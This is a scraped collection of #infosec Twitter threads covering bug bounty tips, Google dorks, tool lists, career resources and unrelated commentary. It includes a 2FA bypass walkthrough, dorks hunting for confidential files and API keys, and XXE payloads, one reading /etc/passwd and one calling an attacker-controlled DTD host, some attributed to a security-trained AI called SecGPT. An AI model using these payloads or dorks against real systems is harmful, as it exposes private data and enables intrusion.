Discover and read the best of Twitter Threads about #infoSec


Two-factor authentication bypass: ⚔️

- In the application's registration, it required a mobile number for compulsory 2-factor authentication.
- Captured the request for mobile number addition
POST /mobile/add

{XXNUMBERXX}
(1/n)

- Now followed the registration normally by adding a mobile number.
- Now when I log in to the account it required an OTP to proceed.
- Used an invalid OTP like 111111 and intercepted the request.
- Changed the request PATH and BODY to the earlier captured request.
(2/n)

- They were implementing checks for all internal API endpoints before entering the OTP but forgot to add a check for the mobile number addition request.
- I was able to add a new number without entering the OTP.
- This led to a 2FA bypass.

#infosec #cybersec #bugbounty
Google Dorks - Cloud Storage #2:

site:dev.azure.com "example[.]com"
site:onedrive.live.com "example[.]com"
site:digitaloceanspaces.com "example[.]com"

Find sensitive data and company assets

#recon #bugbountytips #infosec #seo
Combine:

site:dev.azure.com | site:onedrive.live.com | site:digitaloceanspaces.com "example[.]com"

Add something to narrow the results: "confidential" "privileged" "apikey"
I have unfollowed most of the people I used to follow in #infosec and pretty much all of the musicians I used to follow, from Hall and Oates to Jamiroquai to Siouxsie and the Banshees.

Every world tour and every maskless convention selfie is a betrayal... #CovidIsNotOver 🧵
I'm finally at a point in my life where I can afford overpriced concert tickets and some travel if it's something that's really a priority to me.

But fuck no. The musicians I genuinely used to love now will never see a dime out of me ever again...
I BitTorrent their music, because even Spotify and YouTube plays would give them a fraction of a cent each time.

My favourite musicians (musically, at least) aren't even starving artists. Have you seen Jay Kay's car collection?!
😱 I asked ChatGPT "What are some of the unpopular SQL injection areas" and this is what it replied.

🧵👇

#bugbounty #cybersecurity #infosec #sqli
1. Error messages: Sometimes error messages can reveal important information about the application's database, such as table names or column names. An attacker can use this information to craft a SQL injection attack.
2. Search fields: Search fields are often overlooked when testing for SQL injection vulnerabilities, but they can be an easy target for attackers. In un-sanitized search queries, an attacker can inject SQL code to retrieve sensitive data from the database.
40 Best PenTesting Toolkits

Information Gathering

• OSINT Framework
• Nmap
• Whois
• Recon-ng
• Wireshark
• Dnsrecon
• Google Hacking Database
• Nikto
• Dnsenum

Scanning and Enumeration

• Nmap
• Nikto
• Powershell Scripts
• Openvas
• Nessus
• Sqlninja
• OWASP ZAP
• Wp-scan

Exploitation

• Metasploit
• Sqlmap
• Mitre Att&ck
• Burp Suite
• Hydra
• Netcat
• Routersploit
• Cain and Abel
• John the Ripper
• Hashcat
Google Dorks - File Storage:

site:dropbox.com/s "example[.]com"
site:box.com/s "example[.]com"
site:docs.google.com inurl:"/d/" "example[.]com"

Find sensitive data and company accounts

#recon #bugbountytips #infosec #seo
Combine:

site:dropbox.com/s | site:box.com/s | site:docs.google.com "example[.]com"

Add something to narrow the results: "confidential" "privileged" "not for public release"
20 FREE Cybersecurity Certifications to Add to Resume/CV
1. Introduction to Cybersecurity

netacad.com/courses/cybers…
2. Computer Forensics

edx.org/course/compute…
From Noob to Pentesting Clients in 2023 👇
1. Be laser focused to become l33t. Cybersecurity is a large field and you can't be an expert of everything.
2. Let's say you choose application security. Here's how I would skill up really fast.
HTTP Parameter Pollution @SecGPT has seen in its training.
1. ATO via password reset

The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account; then use the password reset link => ATO.
2. Price manipulation in e-commerce platforms

The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
Malware and Reverse Engineering Contents 📢

#infosec #Hacking #redteam
#malware #ReverseEngineering
#RE

Awesome Malware and Reverse Engineering
lnkd.in/dZFy_k6d

lnkd.in/dZh9hbpq
Malware API
malapi.io

lnkd.in/djqeN7RS

Malware Analysis and Reverse Engineering
lnkd.in/dXjFkZ7a

Retoolkit
lnkd.in/dwn8bRi3

MalwareBazaar
bazaar.abuse.ch

Malware Analysis Journey
lnkd.in/d9B6UGQ8
🚀🔒Exciting news! SecGPT is now LIVE!

Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.👇
1. Trained on an extensive collection of cybersecurity reports, @SecGPT provides you with a deeper understanding of vulnerabilities, exploitation techniques, and emerging trends in cybersecurity.

Its knowledge increases as more reports and writeups are published.
2. Explore SecGPT's capabilities and see how it can assist you in enhancing your cybersecurity expertise.

Try it out for free at alterai.me

#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
CAN I BE HACKED VIA BLUETOOTH?

Yes,

Once a Device is ‘Bluebugged’, the Hacker can access the target device, steal and modify device data, listen to calls, and read messages.

A thread
What is a Bluetooth Attack?

This is a form of hacking technique that allows the attacker access to a device with a Bluetooth discoverable connection or when Bluetooth technology is left on.
Types of Bluetooth Attacks

· Bluesnarf Attack
· Man-in-the-Middle (MiTM) Attack
· BlueJacking
· BlueSmacking (DoS Attack)
· BluePrinting Attack
· BlueBugging
Boost your pentesting and bug bounty game with SecGPT's AI insights from thousands of online security reports.

I've asked it for some XXE payloads found in the reports.
1. Basic XXE payload

`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
2. Blind XXE payload

`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
Unlocking the Secrets: Breaking Access Controls, the basics 👇

(from the AI model I'm currently training on security reports)
1. Direct object reference

This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
2. Horizontal privilege escalation

This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
Often times to simplify my work I build scripts.👇

I recently discovered katana by @pdiscoveryio. And I turned this:

katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"

into this:

kata <tld>
1. The long command does the following:

-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e. twitter.com)
-cs => scope for this regex (limited to the tld and its subdomains)
2. You can download the kata bash script from my repo below. Use it as:

kata <tld>

Do me a favor and star the repo, thanks!

#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips

github.com/CristiVlad25/s…
🚨Security Career Resource Thread 🚨

1️⃣ 2️⃣ resources to break into the field or take your career to the next level 👇

#infosec #cybersecurity #security
Learn:

🎓 How to get into various fields: pentesting, SOC analyst, AppSec, ...

🎫 Certs - do they matter? For which roles?

🧪 Doing security research

📣 Building your brand via blog posts, conference talks, and more

💸 How to think about compensation
📺 Launch your cybersecurity career: @IppSec's advice on how to become a skilled professional

* Technical tips
* Keeping a positive mindset
* Life is what you make it

#bugbounty #bugbountytips

As much as I love automation in recon, 98% of the findings in my pentests have nothing to do with it. Why? 👇
1. Inspired by @NahamSec's recent video.

First, in a large majority of the web pentests, clients want me to focus only on their app and its features. So, there's no need for subdomain enumeration/bruteforcing or any other large recon tactic.
2. This doesn't mean that I don't use automation. I automate some of the boring and repetitive tasks via bash and python.
7 Steps to Take When Pivoting into the Cybersecurity Industry
1. Acquire the fundamental knowledge. This can be achieved via Certifications and Online Courses

2. Improve your Hands-On Skills. Experiment on onsite or offsite environments.
3. Build a great Portfolio. Work on personal and collective projects, improve your writing and documenting skills, participate in hackathons and CTFs and so on.
🧵Thread: "Discovering the Hidden World with Geomint"

Hey OSINT PUNKs! Are you ready to take your investigative skills to the next level? It's time to discover the hidden world with Geomint! 🌎🕵️‍♂️
#OSINT #infosec #GEOMINT
So what exactly is Geomint? It's the art of using geolocation data to gather intelligence about people, places, and events. With Geomint, you can uncover valuable information that may be hidden in plain sight.
There are many tools available for Geomint, and we've compiled a list of some of the best ones to get you started:
More practice, less theory (but not 0 theory)

In the past, I criticized Top 1% THM who know close to nothing about the real-world aspects of a pentest.

My point was not understood and I got a lot of hate for it. Image
1. Again, there's less value in being Top 1% if your experience is purely theoretical.

Yet, you will go way further if you complement your experience (from day-to-day work in cybersecurity) with continuous practice on THM and other platforms (focusing on non-CTFish materials).
2. If you're not working in cybersecurity yet, but you want to, no problem.

Get your daily real-world experience from VDPs (and not paid bounties).
In 1998, two Stanford students published "The Anatomy of a Large-Scale Hypertextual Web Search Engine," in which they wrote, "Advertising funded search engines will be inherently biased towards the advertisers and away from the needs of consumers."

research.google/pubs/pub334/ 1/
If you'd like an essay-formatted version of this thread to read or share, here's a link to it on pluralistic.net, my surveillance-free, ad-free, tracker-free blog:

pluralistic.net/2023/02/24/pas… 2/
The co-authors were Lawrence Page and Sergey Brin, and the "large-scale hypertextual web search-engine" they were describing was their new project, which they called "#Google." They were 100% correct - prescient, even! 3/
🧵
Today marks the first anniversary of the Russia-Ukraine #cyberwar that killed <checks Microsoft's & Mandiant's reports> no one.

Let's go over last year's mass cyberwar #panic. We'll begin with one of the earliest calls to #boycott @Kaspersky:
There was an immediate feeling that everyone must cancel all Kaspersky subscriptions, as if customers -- especially corporate clients -- had a competitor's product waiting in the wings to replace it in some trivial fashion:
Likewise, there was an immediate plea to [translated] "remove Kaspersky from your PC. Now. Immediately." Again, as if customers -- especially corporate clients -- could do it trivially and without serious consequences:
Grow your cybersecurity skills with this incredible collection of FREE learning resources.

⚡️ Get ready to level up!

Follow & share the 🧵

#infosec #cybersecurity #pentesting #bugbounty
#hacking #blueteam #redteam #technology #DataSecurity #CyberSec #Linux #soc #dfir
1️⃣ Hands-on cyber security training through real-world scenarios.

tryhackme.com
2️⃣ LiveOverflow YouTube channel

youtube.com/@LiveOverflow
Learn Cybersecurity for FREE on YouTube.

Here are 12 pages to check out
1 Network Chuck - Everything Cybersecurity related

2 Outpost Gray - Cybersecurity Career Dev

3 The XSS Rat - Bounty Hunting

4 Cyrill Gössi - Cryptography Videos

5 Cyberspatial - Cybersecurity Education and Training

6 Bugcrowd - Bug Bounty Interviews and Methodology

7 Professor Messer - Guides covering Certifications

8 Black Hat - Cybersecurity Technical Conferences

9 Hak5 - Everything Cybersecurity

10 Infosec Institute - Cybersecurity Awareness

11 HackerSploit - Pen Test and Web App Hacking